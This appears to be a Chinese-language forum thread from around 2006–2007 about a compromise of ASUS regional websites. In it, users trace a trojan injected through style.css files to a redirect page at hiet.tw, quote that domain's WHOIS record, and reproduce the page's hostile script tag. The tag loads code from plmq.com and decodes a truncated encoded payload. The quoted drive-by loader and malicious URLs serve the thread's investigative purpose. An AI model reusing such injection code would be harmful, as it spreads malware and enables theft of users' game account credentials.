昨天晚上看已經沒了，今天剛剛連上發現又出現了。

那個木馬網址藏身於此
http://tw.asus.com/include/style.css

jp和global的也有，木馬網址不一樣，但是內容一樣
http://jp.asus.com/include/style.css
http://www.asus.com/include/style.css

不要用IE不就沒事了...

看檔名....八成也是偷遊戲天堂帳號密碼的

用Maxthon 攔截到要安裝某物件的訊息 ！
當然是選擇拒絕 ！

現在ASUS 網站已經修復了
可以安心連結了 ！

看來應該是ASUS 網站被入侵。

IE7玩玩就算了 ....

回頭支持 FF2.0

突然想到有沒有離職員工挾怨報復的可能性

通常這隻木馬都是中國駭客所為，目的在盜取天堂1/2遊戲帳號。

離職員工除非找到安全的銷贓管道，要不然很容易被抓。

上了ASUS網站,重新整理一下,
雖然不會連上 http://www.hiet.tw/1.htm
但還是可在IE狀況列看到出現一下


而這個 hiet.tw的網域, 在 http://rs.twnic.net/ 查是這個人的
但資料也不夠,也沒有電話,真是奇怪!


Domain Name: hiet.tw

Contact:
liting
[email protected]
Record expires on 2007-10-20 (YYYY-MM-DD)
Record created on 2006-10-20 (YYYY-MM-DD)
Registrar: SEEDNET

後來再到 http://www.hiet.tw/1.htm 看了一下,一個空白的網頁, 裡面有個java的連結

<SCRIPT LANGUAGE="JavaScript" src="http://www.plmq.com/script/src/code.js"></script><SCRIPT LANGUAGE="JavaScript"> var v = "原本是一大串編碼,省略jbElEMSAgPSAiY2xzaSINCiAgICBjbElEMiAgPSAi"; document.write(aa(v,100));</SCRIPT>


而這個就是那個Java了! http://www.plmq.com/script/src/code.js
可以用文字檔的方式打開看看裡面的程式是什麼。